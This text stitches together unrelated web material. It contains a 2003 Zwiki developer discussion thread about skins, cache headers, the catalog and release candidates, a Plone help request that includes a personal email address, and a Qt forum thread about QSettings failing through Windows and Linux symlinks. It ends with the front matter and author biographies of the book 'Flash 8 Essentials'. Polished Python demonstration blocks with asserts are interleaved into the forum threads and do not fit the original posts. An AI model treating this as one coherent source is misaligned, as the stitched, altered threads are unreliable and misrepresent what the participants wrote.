After further review, I like these but stand by my wish that they are separated from page content & discussion. Thus, would putting it in a bordered table suffice? (At times I've felt that every transcluded page be similarly indicated/annotated..)
btw, I like the new footer layout.
Subtopics --Simon Michael, Tue, 23 Sep 2003 00:31:17 -0700 reply
It definitely needs something. As you probably saw, I liked the way drupal keeps these links with the document, with the comments coming afterwards and being clearly an "extra" that you're not required to read. The nav links on zwiki.org are too hard to see right now though, in part due to the mish-mash of old- and new-style comments we have on this site.
I'll try enclosing them in a shaded table. I'm not sure I can leave them on though, since they slow down page rendering. I have gone part way to allowing them to be enabled only for certain pages (see widget in the editform) - the idea is you could turn on this feature on eg the top FAQ or Zwiki Book page, where it's most useful; all offspring would inherit the setting too. I'm not 100% happy with this either. I do think it's a nice feature that a wiki can be equivalent to a GNU info manual, though.
skin changes --Simon Michael, Tue, 23 Sep 2003 00:56:30 -0700 reply
btw, I like the new footer layout.
thanks.. you noticed these skin tweaks eh.
For some time I've been tempted to get rid of the gray background at the top in favour of a more plain header like some other popular wiki engines. I think the minimal header says "see! I'm light and efficient like other wikis!", "no need to be scared of zope baggage!" and "ready to customize!". So I've removed gray from the top - and added some at the bottom.
I must have tried just about every layout permutation of those footer elements by now. Subject is now above message body - less compact but much more intuitive to most people.
The help link has moved to the center, leaving only page actions at bottom right. The center links are a bunch of standard wiki actions with "friendly" non-wiki names borrowed from CommonPlace. These replace the user bookmark links - with so many wikis around I think we rarely have time to set bookmarks so I'm thinking that option should be dropped in favour of these standard links. That center area is where we could probably fit the navigation links too.
I originally wanted number of subscribers at the top as a valuable indicator of a page's value - like a rating - but I think it's not such a bad idea to have it down by the comment button either, as a reminder to someone considering making a comment.
Any other feedback ? There's always a bit more clutter than I want, but I think it's functional and shouldn't scare people too badly. If these changes seem agreeable I guess they'll become the default in 0.23.
AttributeError? --Simon Michael, Tue, 23 Sep 2003 01:00:50 -0700 reply
Sorry, I'm stumped by that.
Zwiki and GPL vs ZPL vs BSD vs Public Domain --Simon Michael, Tue, 23 Sep 2003 01:16:23 -0700 reply
Nate - sorry I don't have time to respond at length just now. You make a good point about falling back into fear thinking, but on the other hand it makes no sense for a free software developer to take on risk that can easily be avoided.
Have you read the writings at gnu.org by the way ?
Subtopics --SimonMichael, Tue, 23 Sep 2003 02:23:07 -0700 reply
Test: showing navigation links only in full mode. This makes some kind of sense, but means you can't rely on these links for documentation.
more skin changes --SimonMichael, Tue, 23 Sep 2003 13:04:05 -0700 reply
fit the page management panel on one row; try it and the link panel at the top; move site links left and level-of-detail links right; show comment form even in minimal mode.
more skin changes --DeanGoodmanson, Tue, 23 Sep 2003 15:43:09 -0700 reply
The delete button is where I currently reach for "edit" and "save". !:-} I like edit at the top, but would also like it at the footer, as the next step after reading a page.
Plans for Bookmarks and AnnoyingQuote?
catalog rebuilding help needed --DeanGoodmanson, Tue, 23 Sep 2003 15:47:16 -0700 reply
Would you point me to your code (or catalog rebuilding steps) to keep the catalog from searching the recycle_bin? I need to do so for all sub-folders.
I'm currently battling with backlinks and the catalog code that leverages canonicalLinks seems to be most appropriate, except for those dang subfolder entries!
catalog rebuilding help needed --SimonMichael, Tue, 23 Sep 2003 16:03:19 -0700 reply
Using zope 2.6 or greater, try this in the expr field on the catalog find form:
self.folder().id == 'mywikifolderid'
more skin changes --SimonMichael, Tue, 23 Sep 2003 16:06:44 -0700 reply
Yes that was a problem. It's now at the bottom. Navigation links now appear at the top in full mode, and I've rearranged all the quick access keys, see QuickReference.
more skin changes --SimonMichael, Tue, 23 Sep 2003 16:12:01 -0700 reply
would also like it at the footer, as the next step after reading a page.
It was busy-looking, but I may put it back.. you could also just hit alt-N/P/U.
Plans for Bookmarks and AnnoyingQuote?
Drop em! Front page only!
editform.pt --Steve Knight, Wed, 24 Sep 2003 03:58:21 -0700 reply
Just a question really but my ZWiki users were complaining that when editing forms they had to hit refresh to override their browser caching and get the most recent version.
After trawling through the discussion it appears someone suggested adding <META HTTP-EQUIV name="expire" ...> to the editform.pt. I've done this and now everyone's happy.
Is there any reason why this can't be in the default? Or did I miss something?
editform.pt -- Wed, 24 Sep 2003 07:03:34 -0700 reply
adding <META HTTP-EQUIV name="expire" ...>
The only reason I know of that this isn't the default is the issue where there's a collision (user B updates while A is editing, then A gets the error screen and needs to go back.) The other functionality you may lose is the ability to go "back" and tweak instead of clicking edit again.
Please keep us posted. The browser caching issue is frustrating. Is it any browser or a certain one?
removing HTTP_REFERRER -- Wed, 24 Sep 2003 08:15:21 -0700 reply
Anybody successfully masked the HTTP_REFERRER from your Zope or Zwiki instance?
My attempts to overwrite the variable simply created another! I was hoping a modification to the page code would work, rather than having to modify zope code, as in looking there it seems that the ZMI may leverage it in some places.
editform.pt --Steve Knight, Wed, 24 Sep 2003 08:27:48 -0700 reply
Please keep us posted. The browser caching issue is frustrating. Is it any browser or a certain one?
Opera7.11 & IE6.0
editform.pt --Simon Michael, Wed, 24 Sep 2003 09:11:42 -0700 reply
Thanks for the reminder.. did you see this at #390 Going into edit mode shows old content of page or somewhere else ?
Can someone can tell me exactly what the appropriate header is for the edit form ? I'll add it for 0.23.
I'd welcome any http header suggestions for the other zwiki views too. I once tried setting the last-modified header to last edit time to make them more browser-cacheable, but didn't get it working. Perhaps it would be appropriate for at least minimal mode, which has few dynamic elements.
editform.pt --Simon Michael, Wed, 24 Sep 2003 09:21:48 -0700 reply
The only reason I know of that this isn't the default is the issue where there's a collision (user B updates while A is editing, then A gets the error screen and needs to go back.) The other functionality
How will the expires header affect this ?
you may lose is the ability to go "back" and tweak instead of clicking edit again.
Yes, that would be bad.
Shouldn't some kind of last-modified header be appropriate here also? If we tell the browser when things last changed, we might expect it to figure out what to do.
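The Last-Modified idea discussed here needs the edit time serialized as an RFC 1123 HTTP date. A minimal Python sketch (not Zwiki's actual code) of producing such a header value:

```python
from email.utils import formatdate, parsedate_to_datetime

def last_modified_header(epoch_seconds):
    """Format an epoch timestamp as an RFC 1123 date, the form
    required for Last-Modified and Expires HTTP headers."""
    return formatdate(epoch_seconds, usegmt=True)

# An arbitrary moment in September 2003, around when this thread ran.
stamp = 1064000000
header = last_modified_header(stamp)

# Round trip: the formatted date parses back to the same second,
# which is what lets a browser revalidate with If-Modified-Since.
assert parsedate_to_datetime(header).timestamp() == stamp
assert header.endswith("GMT")
```

In Zope the value would then be set with something like RESPONSE.setHeader('Last-Modified', header); the open question in the thread is when that is safe to send, not how to format it.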
AngryDenial -- Wed, 24 Sep 2003 09:31:23 -0700 reply
Should this page go? Noticed it via FrontPage.
More importantly, can we setup a page for this type of question outside of GeneralDiscussion?
AngryDenial --SimonMichael, Wed, 24 Sep 2003 09:49:06 -0700 reply
Nooo! AngryDenial!
I like this page and you see, it's useful :)
There's WikiCleanup, if you don't want to post such things here. It's not a discussion page though, I would think here is best unless the amount of cleanup activity gets unprecedentedly huge.
editform.pt --Steve Knight, Wed, 24 Sep 2003 09:58:59 -0700 reply
you may lose is the ability to go "back" and tweak instead of clicking edit again.
Yes, that would be bad.
Ahh maybe that's why it was never done before. Speaking personally I think I'd ALWAYS want the editform to show me the current page in the ZODB. But I guess I'm probably just a bit weird!
I'm not sure how you're going to tell the difference between a back and a fresh edit. Is there a way?
AngryDenial -- Wed, 24 Sep 2003 10:23:39 -0700 reply
:-)
I've added " More like this: "
editform.pt --dan mcmullen, Wed, 24 Sep 2003 12:21:46 -0700 reply
SimonMichael wrote:
I once tried setting the last-modified header to last edit time to make them more browser-cacheable, but didn't get it working.
setting last-modified seems like a good idea to me. it would make it easier to track changes in ZWiki pages generally. what were the problems? (i might be able to work on this.)
re: couple of ?s -- Wed, 24 Sep 2003 12:57:02 -0700 reply
an update:
SimonMichael wrote:
>The regulations form was removed from zwiki's plone edit form. [...]? You could get the old editform.dtml from the 0.18 release and drop it into a editform DTMLMethod in your wiki. It might work. If you go to that trouble, keep us posted.<<<
this displays the regulations edit form at the bottom of the edit page, but 'edit by owner' and 'create subpage by owner' don't seem to have any effect - anonymous users can still edit/create. possibly i'm not understanding ownership. is this the authenticated zope owner? the user saved in the cookies?
in any case, i'm wondering: can (most of) the functionality of regulations be achieved using SubWikis? and the usual Zope permissions mechanism? anything lost using that scheme? what is the state of the art in SubWikis??
regarding the External Editor
mbcs error: Casey Duncan, the author, says this may be due to a missing dependancy in the windoze .exe version. he will be looking into it, but his workaround of using the source distribution got things working for me (w/ a small hack).
editform.pt --Simon Michael, Wed, 24 Sep 2003 16:56:30 -0700 reply
It didn't work. :)
How can I mirror? --DeanGoodmanson, Thu, 25 Sep 2003 07:25:47 -0700 reply
another possibility:
re: couple of ?s --Simon Michael, Thu, 25 Sep 2003 09:58:49 -0700 reply
I'd guess regulations pay attention to the authenticated zope owner, only. So it may be that they don't work properly in anonymous-accessible wikis.
The advantage of regulations was that any user could set fine-grained policy within a single large wiki, without having to go to the ZMI. They were used on the old zope.org. But IMHO they made things so complicated that users went elsewhere.
1.0 discussion --Simon Michael, Thu, 25 Sep 2003 16:42:16 -0700 reply
I just posted this over on ZwikiOneReleaseDiscussion, and I guess that page is the place to continue this thread. Comments welcome.
All going well, the november release will mark the five year anniversary of the first Zwiki release. Though ZwikiInternationalization? has not yet happened to the degree I intended - it needs someone to take it by the scruff of the neck - five years is long enough.
I've updated SimonsPlan2004 with some tentative plans for (gasp) 1.0. This includes the things I can think of right now that seem important for 1.0. I think Nov 1 is too soon for 1.0, but it just may be the right time to call it 1.0 alpha. I think we need a feature freeze for at least one solid month after that, preferably two, before 1.0 (may be hard).
0.23rc1 released --simon, Thu, 25 Sep 2003 22:05:04 -0700 reply
or is it an alpha...
ReleaseNotes are not done, please see ChangeLog? for now.
cookie problems w/ redirects --dan mcmullen, Fri, 26 Sep 2003 15:38:10 -0700 reply
anyone else had problems w/ ZWiki setting cookies when using external redirects?
i'm using (windoze) Apache to redirect requests like to which a Zope virtualHostMonster translates to
the problem i'm seeing is that when UserOptions? tries to set cookies (for either full/simple/minimal or user prefs) only one or two of the cookies are actually set.
i put some prints in UserFolder? to confirm that all the cookies were getting into the RESPONSE. other than that, i'm stumped.
tia, dan
cookie problems w/ redirects --Simon Michael, Fri, 26 Sep 2003 18:24:58 -0700 reply
Hi Dan.. printing stuff in UserOptions? is a good idea. As it happens I have just been debugging a problem there, I used dtml-var REQUEST and some printouts where it sets cookies.
FWIW my problem was this: I was running UserOptions? inside a plone site for the first time, and in this case it turns out for some reason that dtml code's namespace does not include the contents of REQUEST. So I had to add a dtml-with REQUEST around the whole lot.
0.23rc2 released --SimonMichael, Fri, 26 Sep 2003 21:07:27 -0700 reply
with ReleaseNotes. "Permission renames, useful page/catalog/tracker setup methods, more functional default skin, expensive but nifty hierarchy navigation options, miscellaneous bugfixes."
help helping --dan mcmullen, Sat, 27 Sep 2003 16:53:14 -0700 reply
as a newcomer to this community, i'm at a bit of a loss how best to help w/ the 0.23 release.
i've installed rc2. (on top of my existing, backed up, data - is this safe? :-) i'll report problems from my present use of ZWiki as a personal data repository. (what's the best way to do that? the tracker?)
i could just go bug hunting & probably turn up some odd corner cases, but do we need more of that for this release? any particular areas of functionality that could use some exercise?
i could also do some bug squashing if someone pointed me at a few that would be good to fix, but i'm unsure which are worth the effort at this stage.
i have a patch or two i've made to the 0.22 codebase that i will be integrating into 0.23 asap. should i wait to suggest those til after 0.23 is released?
is general feedback on the design and user interface of 0.23 useful at this point? where should that go?
suggestions?
tia, dan
help helping --SimonMichael, Sat, 27 Sep 2003 19:39:28 -0700 reply
Thanks Dan, I like to see this question :)
Quick answers: yes it's generally very safe to upgrade zwiki. There has never been a case of data loss due to upgrade, as far as I know. Of course the recommendation is to always backup anyway.
The tracker is the right place for issues - if you're unsure of its nature or want some help characterising it, post here first.
I'm not looking for new bugs before this release, just hoping we catch any obvious breakage or regressions. We do need a serious bug squash effort, but during a full month (see SimonsPlan2004). I don't have any specific shaky feelings about 0.23's new stuff (ReleaseNotes) - I've seen the setup methods work in a plone site, I've had a good look at the hierarchy code in action here - so I would say test whatever there looks interesting to you or is something you depend on.
But any bug squashing, any time, is very welcome. Use FilterIssues to narrow down the open issues - I did a pass through these last night and closed about ten (the easy ones :). Patches too - post these somewhere on the wiki, in the tracker, or here. Design & UI feedback - sure, this is the place.
If you're able to help with the unit tests or any automated testing, that is very effective. One thing I think we should do is convert the unit tests to use ZopeTestCase?, as the latest ones do..
In short, lots of opportunities. I hope one or more of these catches your interest.
help helping --SimonMichael, Sat, 27 Sep 2003 19:49:58 -0700 reply
Releases are made on their own CVS branch, by the way, so in principle we should be able to handle continuous full-speed development on the trunk.
See also the projects list on ZwikiDevelopment?.
help helping --SimonMichael, Sat, 27 Sep 2003 20:01:04 -0700 reply
I guess we do need some more testing on the setup methods. Eg setupPages, with a single page, with existing pages, in plain wikis and CMF wikis.
permission fix --simon, Sat, 27 Sep 2003 20:14:31 -0700 reply
The skins were using the old add comment permission, fixed in cvs.
0.23rc2 released -- Sun, 28 Sep 2003 10:06:58 -0700 reply
setupPages method does not parse the optional parents list (#parents:)?
RecentChanges? glitch? --dan mcmullen, Sun, 28 Sep 2003 12:54:22 -0700 reply
in RecentChanges?, my ZWiki ends up getting the modification date from the line:
<dtml-var bobobase_modification_time>
this ends up fetching the modification date of the Catalog's brain object at the top of the dtml stack, instead of the WikiPage? as desired.
my fix is to wrap the logic to fetch the modification date with:
<dtml-with "_.getitem('sequence-item').getObject()"> ... </dtml-with>
this puts the WikiPage? itself on the top of the stack, & bobobase_modification_time returns its date as desired.
is there some reason the attempts to fetch lastEditTime() are failing on my ZWiki?
should i make an "official" patch in ZwikiIssueTracker for this?
also, to these novice eyes it looks like lastEditTime.toZone( and bobobase_modification_time.toZone( should have '()' before the '.'. am i missing something? (if so, then there's an extra '()' in the similar brute force code later on.)
also, is there a reason that an extra blank line is being inserted after every change line (w/ summaries off)?
best, dan
RecentChanges? glitch? --simon, Sun, 28 Sep 2003 15:59:49 -0700 reply
is there some reason the attempts to fetch lastEditTime() are failing on my ZWiki?
Yes (he said helpfully :).
Perhaps remove all that try..except malarkey to find out more. We should never be falling back on bobobase_modification_time these days. What's supposed to happen is RC calls pages, which returns "brains" - genuine catalog brains or pseudo PageBrains? - which should have a lastEditTime attribute. Perhaps you have a catalog installed, but without the lastEditTime metadata field ? setupCatalog should fix this.
Modern RC uses these brain objects (containing only small metadata) and tries to avoid loading the actual page objects, to reduce zodb activity and memory usage. Brain objects store things like lastEditTime and bobobase_modification_time as simple attributes. Hope this makes things clearer.
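The "brains" Simon describes are an instance of the lazy metadata-proxy pattern: cheap attributes up front, the real object only loaded on demand. A hypothetical Python sketch of that idea (the real ZCatalog brain API differs):

```python
class PageBrain:
    """A lightweight stand-in for a catalog record: cheap metadata
    lives in plain attributes; the full object loads only on demand."""

    def __init__(self, page_id, last_edit_time, loader):
        self.id = page_id
        self.lastEditTime = last_edit_time
        self._loader = loader  # callable that fetches the full object

    def getObject(self):
        # The expensive step, deferred until actually needed.
        return self._loader(self.id)


# Hypothetical page store; getObject() is the only path into it.
pages = {"FrontPage": {"id": "FrontPage", "body": "welcome..."}}
loads = []  # record of every expensive load


def load_page(page_id):
    loads.append(page_id)
    return pages[page_id]


brain = PageBrain("FrontPage", 1064000000, load_page)
assert brain.lastEditTime == 1064000000 and loads == []  # metadata is free
assert brain.getObject()["body"] == "welcome..."         # full load on demand
assert loads == ["FrontPage"]
```

This is why a missing lastEditTime metadata field in the catalog breaks RecentChanges: the brain simply has no such attribute until setupCatalog adds it.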
I left the blank line in the latest RC layout because it seemed to help make the thing more regular and readable when page names are different lengths, some have notes and some don't, etc. I do sometimes miss the more compact display.
0.23rc2 released --simon, Sun, 28 Sep 2003 16:12:09 -0700 reply
Thanks! Fixed in cvs.
RecentChanges? glitch? --dan mcmullen, Sun, 28 Sep 2003 16:32:39 -0700 reply
the exception that lastEditTime() generates is:
RuntimeError, function attributes not accessible in restricted mode
any clue what this means? (probably another misconfiguration on my end. :-(
RecentChanges? glitch? --simon, Sun, 28 Sep 2003 16:34:26 -0700 reply
No. Try setupCatalog ?
RecentChanges? glitch? --dan mcmullen, Sun, 28 Sep 2003 16:35:17 -0700 reply
oh yeah: i checked & there is a lastEditTime field in my catalog.
(commenting too quickly. time to stop hacking. :-|
RecentChanges? glitch? --simon, Sun, 28 Sep 2003 16:35:42 -0700 reply
Also maybe brackets you added ? Be sure to use the latest standard RecentChanges? code.
0.23rc3 released --simon, Sun, 28 Sep 2003 16:40:38 -0700 reply
Gets like chat, doesn't it :)
Zwiki 0.23rc3 2003-09-28
- disable regulations, permanently
- set parents when installing default pages
- update catalog after subscribing/unsubscribing (fixes non-updating "other page subscriptions")
- use renamed add comments permission in skins
- make post-delete redirect work when the parent is freeform-named
- fix some cases where the current page was not highlighted if the name contained punctuation
- make the midsection marker (used for subtopics) a little more robust
new linking code --simon, Sun, 28 Sep 2003 19:51:10 -0700 reply
I'm testing the next step in linking optimization (all pages* methods return brains, so renderLink doesn't need to hit the zodb). Shout if you find breakage around zwiki.org.
0.23rc3 released -- Mon, 29 Sep 2003 00:40:51 -0700 reply
Without ZCatalog, SearchPage always hits all pages. Bug?
RecentChanges? glitch? --dan mcmullen, Mon, 29 Sep 2003 09:45:28 -0700 reply
simon wrote: >>>Be sure to use the latest standard RecentChanges? code<<<
oh foo! latest RecentChanges? fixes things.
(so far: 1 problem already found; 1 false alarm; 1 operator error: guess this is a "learning experience" :-)
so, to completely upgrade an existing ZWiki:
- replace Products/ZWiki folder
- click "Refresh this product" on the ZWiki product page/Refresh tab
- copy customized standard pages/dtml someplace
- invoke SomePage?/setupPages
- invoke SomePage?/setupDtmlMethods
- invoke SomePage?/setupCatalog
- merge customizations into new standard pages/dtml
- invoke SomePage?/upgradeAll
did i miss anything?
simon also wrote: >>>Gets like chat, doesn't it :)<<<
would be nice if there were some way to mark a comment as "transient" so that it would disappear after a period of time (unless someone edits it to "persistent").
and simon wrote earlier: >>>I do sometimes miss the more compact [RecentChanges] display.<<<
any possibility of a finer grained preferences mechanism? it's unfortunate to have to make choices like this absolute. maybe a UserNamePreferences? page could be scanned automagically?
also, the trailing WikiName problem that is fixed for StructuredText pages still exists in WikiWikiMarkup? pages. (you probably know this. :-)
best, dan
Localization -- Mon, 29 Sep 2003 12:02:53 -0700 reply
If possible, please move the words "next", "previous" and "up" defined in navlinks() of Parents.py to the skin wikipage.pt. Then localization will be easy. (0.23.0rc3)
external edit nit --DanMcmullen, Mon, 29 Sep 2003 17:26:33 -0700 reply
if i use an external editor to modify a page and (inadvertently) remove the blank line after the "Log:" header i get:
- Module ZPublisher?.Publish, line 98, in publish
- Module ZPublisher?.mapply, line 88, in mapply
- Module ZPublisher?.Publish, line 39, in call_object
- Module Products.ZWiki.ZWikiPage, line 1980, in PUT
- Module Products.ZWiki.Utils, line 564, in parseHeadersBody
NameError?: global name 'lstrip' is not defined
fyi: midsection marker visible --DanMcmullen, Tue, 30 Sep 2003 09:42:19 -0700 reply
as of tuesday am
fyi: midsection marker visible --Simon Michael, Tue, 30 Sep 2003 10:06:37 -0700 reply
Dan, all, thanks for your investigations and reports.
Note you'll see "zwikimidsection" glitches all over, most or all of these are pages that were rendered with earlier code. Visiting /clearCache or hitting alt-W should fix it. Or I could upgradeAll but that would tie up the site for half an hour.
I'm mostly offline this week - will look at these other things when I can, and possibly hold off the release till I get back if it seems necessary.
running upgradeAll --SimonMichael, Tue, 30 Sep 2003 11:08:10 -0700 reply
site will be slow for a bit
felt like hacking some code today... --DanMcmullen, Tue, 30 Sep 2003 21:23:09 -0700 reply
...so tried out one way of removing HTML from Parents.py, inspired by Simon's comment wondering if this would be possible. anyone interested can take a look at the extremely fresh results at RenderNestingX. feedback appreciated. (it includes the option of displaying the page ancestry header as one line of page names separated by "::".)
... -- Sat, 22 Nov 2003 02:45:28 -0800 reply
i designed a plone site. i have one problem: the site header includes buttons, i.e. labournews, archives, etc. when i click on labour news, the contents of that folder display in plone's default format. i want this - and every folder's contents - to display in the same user-defined format, not the plone-defined format. how can i solve this problem? please send a solution to this address: sajumaryjoseph@yahoo.com
QSettings problem when input file is a link
Hi, i'm having problems loading settings with QSettings on a windows machine.
I have a symlink file in the Project/debug folder that points to another file in another folder (writable and readable). When I try to read some settings from that file it behaves like the file doesn't exist; when I try to write some settings to that link it overwrites the entire file, deleting all the settings in it.
The link file is a symlink, not a normal shortcut (that doesn't work either; the same behavior is triggered); it is created with the Windows tool mklink.
main.cpp:
#include <QGuiApplication>
#include <QQmlApplicationEngine>
#include <QSettings>
#include <QDir>
#include <QCoreApplication>

int main(int argc, char *argv[])
{
    QGuiApplication app(argc, argv);

    QQmlApplicationEngine engine;
    engine.load(QUrl(QStringLiteral("qrc:/main.qml")));
    if (engine.rootObjects().isEmpty())
        return -1;

    qInfo(QString(QCoreApplication::applicationDirPath() + "/test.ini").toLatin1().data());

    QSettings *_persisted_repository = new QSettings(QCoreApplication::applicationDirPath() + "/test.ini", QSettings::IniFormat);
    _persisted_repository->setValue("aa", "false");
    //_persisted_repository->setValue("bb", "false");
    _persisted_repository->setValue("cc", "false");

    qInfo(_persisted_repository->value("bb").toString().toLatin1().data());
    _persisted_repository->sync();

    return app.exec();
}
even if the setting "bb=false" is originally in the file, it disappears, and this line has a null output in the console:
qInfo(_persisted_repository->value("bb").toString().toLatin1().data());
P.S: this behavior is not triggered with a file that is not a link or a symlink; the same code with "test.ini" as a normal file works fine
a link should be something like "test.ini.lnk". Maybe you just have some confusion with the file names, due to the fact that WINDOWS by default does not show the ".lnk" extension in the explorer.
-Michael.
@m.sue
Hi, the mklink Windows tool makes filesystem-level links; they are not .lnk files.
It's similar to the ones seen on Linux.
@m-sue I tried that too but I got the same behavior and @mrjj is correct, it's not a ".lnk" file. Thanks :)
@damre22
I'm a bit surprised the symbolic link doesn't work.
Most programs see the actual file and have no awareness of the link.
Did you try both types (symbolic and hard link ) ?
@mrjj sadly the file I need to reference is on another partition, so my only option is a symlink; I cannot use hard links between different drives
@damre22
ah, i forgot that limitation.
Have you tried with QFile and see if that will read correctly via the link?
It might be a deeper issue than QSettings.
@mrjj said in QSettings problem when input file is a link:
Have you tried with QFile and see if that will read correctly via the link?
Yes I tried, the file is not even considered a link.
QFile file("test.ini"); qInfo(file.symLinkTarget().toLatin1().data());
returns a null string but is bound to the correct file. However I think this is correct, because that file technically is not a link
It might be a deeper issue than QSettings.
I think I can agree on that
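The distinction being debated here - Explorer .lnk shortcuts versus true filesystem symlinks - can be illustrated outside Qt. A Python sketch (assuming a POSIX-style filesystem, since creating symlinks on Windows needs extra privileges) showing that the OS itself treats a real symlink transparently for reads, which supports the suspicion that the problem sits in QSettings rather than the filesystem:

```python
import os
import tempfile
from pathlib import Path


def probe_symlink():
    """Create a real file plus a symlink to it (as mklink would)
    and report what the symlink looks like from Python."""
    with tempfile.TemporaryDirectory() as d:
        target = Path(d) / "real.ini"
        target.write_text("[general]\naa=false\n")

        link = Path(d) / "test.ini"
        link.symlink_to(target)  # filesystem-level link, not a .lnk shortcut

        return {
            "is_symlink": link.is_symlink(),
            # Reads follow the link to the target's contents.
            "reads_target": link.read_text() == target.read_text(),
            # The path resolves all the way to the real file.
            "resolves": os.path.realpath(link) == os.path.realpath(target),
        }


result = probe_symlink()
assert all(result.values())
```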
Ok
it seems that symbolic links are not considered for symLinkTarget()
as the docs say
"Returns the absolute path of the file or directory a symlink (or shortcut on Windows) points to"
So it sounds like only .lnk is handled/known
Just to be sure i understand your setup.
In the build/deploy folder you have a test.ini link to the real file on the other partition?
And using that with QSettings does odd things, whereas the same code with the real file directly in place just works?
@mrjj said in QSettings problem when input file is a link:
In the build/deploy folder you have a test.ini link to the real file on the other partition?
Exactly
And using that with QSettings does odd things, whereas the same code with the real file directly in place just works?
yes, with the real file the same code works fine, by the way I opened a bug on bugreports.qt.io
because I think this is a problem with QSettings
- kshegunov Qt Champions 2017
Check if a regular file
QFilecan be opened, read and written when it's a symlink. If that is okay, then the problem is with
QSettings, if not probably the problem is with the underlying file system('s API/integration).
@damre22
Good, I was about to suggest that, since it seems reproducible in a small sample and it sounds like you tested it's not just a "user" error.
Could you perhaps show the mklink command line you used in the bug report, for completeness?
@kshegunov I will check that too and I will update the bug report if I find something new, thank you
Hi,
I also had a QSettings::AccessError when trying to QSettings::sync() on a config.ini file on an ext4 file system + symlink, with Qt 5.7.1 on Raspbian OS Stretch.
Here is my snippet to reproduce locally:
mysettings->sync();
QSettings::Status s = mysettings->status();
QString msg;
switch (s) {
case QSettings::NoError:
    msg = "No error occurred";
    break;
case QSettings::AccessError:
    msg = "An access error occurred (e.g. trying to write to a read-only file).";
    break;
case QSettings::FormatError:
    msg = "A format error occurred (e.g. loading a malformed INI file).";
    break;
}
qDebug() << "writing configuration_file" << mysettings->fileName() << "status:" << msg << endl;
In my debug output I get:
2019-04-01 12:08:53 : writing configuration_file "/home/pi/config.ini" status: "An access error occurred (e.g. trying to write to a read-only file)."
and the file
pi@machine:~ $ ls -l config.ini
lrwxrwxrwx 1 pi pi 28 avril 1 12:08 config.ini -> /etc/config/config.ini
the file is actually perfectly writable by the pi user
pi@machine:~ $ ls -l /etc/config/config.ini
-rw-r--r-- 1 pi pi 829 avril 1 12:08 /etc/config/config.ini
Is it fixed in newer version of Qt?
The idea behind using a symlink is a backward-compatible path, plus using etckeeper in /etc/.
Any suggestion for a workaround?
Regards,
Sylvain.
Replying to myself:
The bug report says it is fixed in 5.10.1.
And it can be made to work with correct folder permissions:
$ ls -ld /etc/config/
drwxr-xr-x 2 root root 4096 avril 1 11:15 /etc/config/
$ sudo chgrp pi /etc/config/
$ sudo chmod g+w /etc/config/
$ ls -ld /etc/cleandrop/
drwxrwxr-x 2 root pi 4096 avril 1 11:15 /etc/config/
resolving the symlink doesn't help
// resolve symlink
QFileInfo info(_configuration_file);
if (info.isSymLink())
    _configuration_file = info.symLinkTarget();
So I removed this fix, fixed the folder permission, and it worked.
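One plausible explanation for both symptoms in this thread - assuming (not confirmed here) that QSettings performs a safe-save, i.e. writes a temporary file and then renames it over the destination: the rename needs write permission on the containing directory, which matches the chmod g+w fix, and renaming over a symlink replaces the link itself rather than updating its target, which matches the "settings disappeared" report. A Python sketch of that pattern:

```python
import os
import tempfile
from pathlib import Path


def safe_save(path, text):
    """Write to a temp file in the same directory, then atomically
    rename it over `path` -- a common pattern for settings files."""
    tmp = path.with_suffix(".tmp")
    tmp.write_text(text)
    os.replace(tmp, path)  # rename(2): needs write access to the directory


def demo():
    with tempfile.TemporaryDirectory() as d:
        target = Path(d) / "etc" / "config.ini"
        target.parent.mkdir()
        target.write_text("bb=false\n")  # the pre-existing setting

        link = Path(d) / "config.ini"
        link.symlink_to(target)          # like the mklink setup above

        safe_save(link, "aa=false\n")    # "save settings" via the symlink
        return {
            "still_symlink": link.is_symlink(),
            "link_text": link.read_text(),
            "target_text": target.read_text(),
        }


result = demo()
# The symlink was replaced by a fresh regular file; the real target
# (and its "bb" setting) was never updated -- matching the report.
assert result == {"still_symlink": False,
                  "link_text": "aa=false\n",
                  "target_text": "bb=false\n"}
```

Qt's actual fix in 5.10.1 presumably resolves the link before saving, much like the QFileInfo::symLinkTarget() workaround shown earlier in the thread.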
Flash 8 Essentials
Paul Barnes-Hoggett
Stephen Downs
Glen Rhodes
Craig Swann
Matt Voerman
Todd Yard
Flash 8 Essentials
Copyright © 2006 by Paul Barnes-Hoggett, Stephen Downs, Glen Rhodes, Craig Swann, Matt Voerman, Todd Yard
All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, or by any information
storage or retrieval system, without the prior written permission of
the copyright owner and the publisher.
ISBN (pbk): 1-59059-532-7
Printed and bound in the United States of America
9 8 7 6 5 4 3 2 1
2560 Ninth Street, Suite 219, Berkeley, CA 94710.
The source code for this book is freely available to readers at in the Downloads section.
Credits
Additional Material
Chris Mills
Lead Editor
Chris Mills
Technical Reviewer
Marco Casario Editors
Damon Larson, Julie Smith, Nicole LeClerc
Assistant Production Director
Kari Brooks-Copony
Production Editor
Katie Stence
Compositors
Dina Quan and
Van Winkle Design Group
Proofreader
Elizabeth Berry
Indexer
Lucie Haskins
Artist
April Milne
Interior and Cover Designer
Kurt Krames
Manufacturing Director
Tom Debolski
Dedicated to Fitz: "Up the Revolution!"
Paul Barnes-Hoggett
To Audrey, my little upgrade essential.
Todd Yard
To my loving and supportive family, whom I thank for
providing me with a positive and nurturing childhood full of
encouragement to explore and discover where my passion lies.
Craig Swann
About the Authors
After studying architecture for seven years, Paul Barnes-Hoggett
changed his mind and decided to spend his time designing the
"intergoogle." He spent time as a lead developer at boxnewmedia, where
he built award-winning sites for clients such as Select Model
Management. (In his own words, he admits, "It's a tough job looking at
pictures of beautiful people all day, but someone has to do it.")
He set up Eyefodder in 2003, which specializes in
building rich Internet applications for the media industry, and has
built solutions for clients including FHM, Adidas, Air Miles, and ITV.
When not pushing pixels, Paul likes to eat, drink, and be merry. To get
in contact with Paul, visit.
Stephen Downs, aka Tink, has been a freelance Flash
designer/developer for the past four years, and has a background in
art, design, and photography. Based in London, England, he works on a
wide range of projects, both for other companies and his own clients.
The growth in his workload has recently led to the startup of his own
company, Tink Ltd. His primary focus is user interaction and
interactive motion, which includes integrating design and development
to any design specification using best practice methodologies. For
contact info and work examples, visit. For Tink's daily thoughts, visit.
Glen Rhodes is the CTO of CRASH!MEDIA, located in
Toronto, Canada. He's also a Flash game developer and has authored over
ten books, including Macromedia Flash MX 2004 Game Development, Flash MX 2004 Games Most Wanted, and Flash MX Designer's ActionScript Reference. He's also a regular writer for several computer magazines, including Web Designer and Practical Web Projects.
Glen has developed dozens of games for many platforms, including
Windows PC, PlayStation, and these days, Macromedia Flash. He has
